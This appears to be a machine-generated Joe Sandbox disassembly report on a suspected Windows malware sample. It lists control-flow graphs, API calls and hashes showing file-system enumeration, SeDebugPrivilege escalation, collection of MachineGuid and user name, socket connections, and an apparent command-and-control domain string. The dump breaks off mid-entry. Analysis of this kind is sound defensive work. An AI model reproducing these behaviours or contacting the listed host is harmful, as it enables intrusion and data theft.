40f0c9 9675->9676 9678 404cbf 8 API calls 9676->9678 9686 40f115 9676->9686 9677 41219c 14 API calls 9680 40f128 9677->9680 9679 40f0ed 9678->9679 9681 404cbf 8 API calls 9679->9681 9682 40f0fb 9681->9682 9683 413aca 4 API calls 9682->9683 9684 40f10a 9683->9684 9685 405695 2 API calls 9684->9685 9685->9686 9686->9677

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 154 403f97-403f9d 152->154 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 189 403e30-403e4c call 405b6f 172->189 190 403e24-403e2e 172->190 173->166 186 403dfb-403e10 call 405eff 173->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->172 189->166 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->166 190->189 193->162 205 403f8d 196->205 197->159 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 205->160 209->181 217->154
                                  APIs
                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$FirstNext
                                  • String ID: %s\%s$%s\*$Program Files$Windows
                                  • API String ID: 1690352074-2009209621
                                  • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                  • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                  • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                  • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                  • String ID: SeDebugPrivilege
                                  • API String ID: 3615134276-2896544425
                                  • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                  • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                  • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                  • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                  • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                  • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                  • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: NameUser
                                  • String ID:
                                  • API String ID: 2645101109-0
                                  • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                  • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                  • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                  • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                  APIs
                                  • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                  • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                  • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                  • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062e4 call 4031e5 265->273 266->257 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                  • _wmemset.LIBCMT ref: 00406244
                                  • _wmemset.LIBCMT ref: 00406261
                                  • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _wmemset$ErrorInformationLastToken
                                  • String ID: IDA$IDA
                                  • API String ID: 487585393-2020647798
                                  • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                  • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                  • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                  • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                                  APIs
                                  • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                  • socket.WS2_32(?,?,?), ref: 00404E7A
                                  • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: freeaddrinfogetaddrinfosocket
                                  • String ID:
                                  • API String ID: 2479546573-0
                                  • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                  • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                  • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                  • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 566 404186-40418c 563->566 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->566 579->580 580->572 588 404142-40415e call 4031e5 ReadFile 580->588 583->563 588->574 593 404160-404178 call 4031e5 588->593 593->574
                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$AllocCreateReadVirtual
                                  • String ID: .tmp
                                  • API String ID: 3585551309-2986845003
                                  • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                  • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                  • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                  • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                  APIs
                                  • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                  • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                  • GetLastError.KERNEL32 ref: 0041399E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Error$CreateLastModeMutex
                                  • String ID:
                                  • API String ID: 3448925889-0
                                  • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                  • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                  • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                  • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                  • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreatePointerWrite
                                  • String ID:
                                  • API String ID: 3672724799-0
                                  • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                  • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                  • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                  • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                    • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                    • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                    • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$CreateFreeProcessThread_wmemset
                                  • String ID: ckav.ru
                                  • API String ID: 2915393847-2696028687
                                  • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                  • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                  • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                  • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                  APIs
                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                  • _wmemset.LIBCMT ref: 0040634F
                                    • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser_wmemset
                                  • String ID: CA
                                  • API String ID: 2078537776-1052703068
                                  • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                  • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                  • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                  • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                  APIs
                                  • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationToken
                                  • String ID: IDA
                                  • API String ID: 4114910276-365204570
                                  • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                  • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                  • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                  • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                  APIs
                                  • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID: s1@
                                  • API String ID: 190572456-427247929
                                  • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                  • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                  • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                  • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                  APIs
                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                  • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                  • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 1425999871-0
                                  • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                  • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                  • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                  • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                  APIs
                                  • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CheckMembershipToken
                                  • String ID:
                                  • API String ID: 1351025785-0
                                  • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                  • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                  • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                  • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                  APIs
                                  • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
